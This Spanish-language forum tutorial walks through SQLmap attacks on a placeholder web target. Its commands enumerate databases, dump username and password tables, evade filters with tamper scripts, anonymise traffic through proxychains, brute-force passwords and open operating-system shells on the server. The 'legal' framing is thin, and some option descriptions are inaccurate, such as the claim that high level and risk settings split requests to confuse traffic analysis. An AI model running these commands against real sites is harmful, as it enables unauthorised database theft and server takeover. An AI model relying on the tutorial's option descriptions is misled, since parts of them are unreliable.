Título: [TUTORIAL] Cómo romper aplicaciones web con SQLmap (legalmente) Publicado por: blckkey en 8 Enero 2025, 10:35 am Este tutorial es para los que creen que probar SQL Injection es escribir comillas en un campo de texto. Aquí vamos a llevar SQLmap al siguiente nivel. Rápido, directo y sin rodeos. Preparación del entorno Primero, asegúrate de tener SQLmap instalado. Si usas Linux: Código: sudo apt update && sudo apt install sqlmap Para Windows, descárgalo desde su página oficial. (Usa una máquina virtual o VPN para mantenerte seguro mientras experimentas.) Primer escaneo: Básico pero funcional Para probar rápidamente si un sitio es vulnerable: Código: sqlmap -u "http://target.com/vuln.php?id=1" --dbs -u: La URL objetivo. --dbs: Enumera las bases de datos disponibles si encuentra vulnerabilidades. Extracción de información (Bases de datos, tablas y columnas) Obtener bases de datos: Código: sqlmap -u "http://target.com/vuln.php?id=1" --dbs Elegir una base de datos y sacar tablas: Código: sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb --tables Ver columnas de una tabla: Código: sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users --columns Sacar datos (usuarios y contraseñas): Código: sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users -C username,password --dump Saltarse restricciones (Bypass) Usar técnicas de evasión: Código: sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment Con ProxyChains para anonimato: Código: proxychains sqlmap -u "http://target.com/vuln.php?id=1" --dbs Dividir peticiones para confundir el análisis de tráfico: Código: sqlmap -u "http://target.com/vuln.php?id=1" --level=5 --risk=3 Automatizar fuerza bruta Si quieres probar contraseñas rápidamente: Código: sqlmap -u "http://target.com/vuln.php?id=1" --passwords Prueba diccionarios personalizados: Código: sqlmap -u "http://target.com/vuln.php?id=1" --wordlist=users.txt Subir shells (para auditorías internas) Subir un shell interactivo directamente: Código: sqlmap -u "http://target.com/vuln.php?id=1" --os-shell Acceder al sistema operativo si el servidor es vulnerable: Código: sqlmap -u "http://target.com/vuln.php?id=1" --os-pwn SQLmap no es solo para encontrar vulnerabilidades; es para entender cómo funcionan las aplicaciones y cómo protegerlas. Si algo no debería estar expuesto, avisa antes de explotarlo. |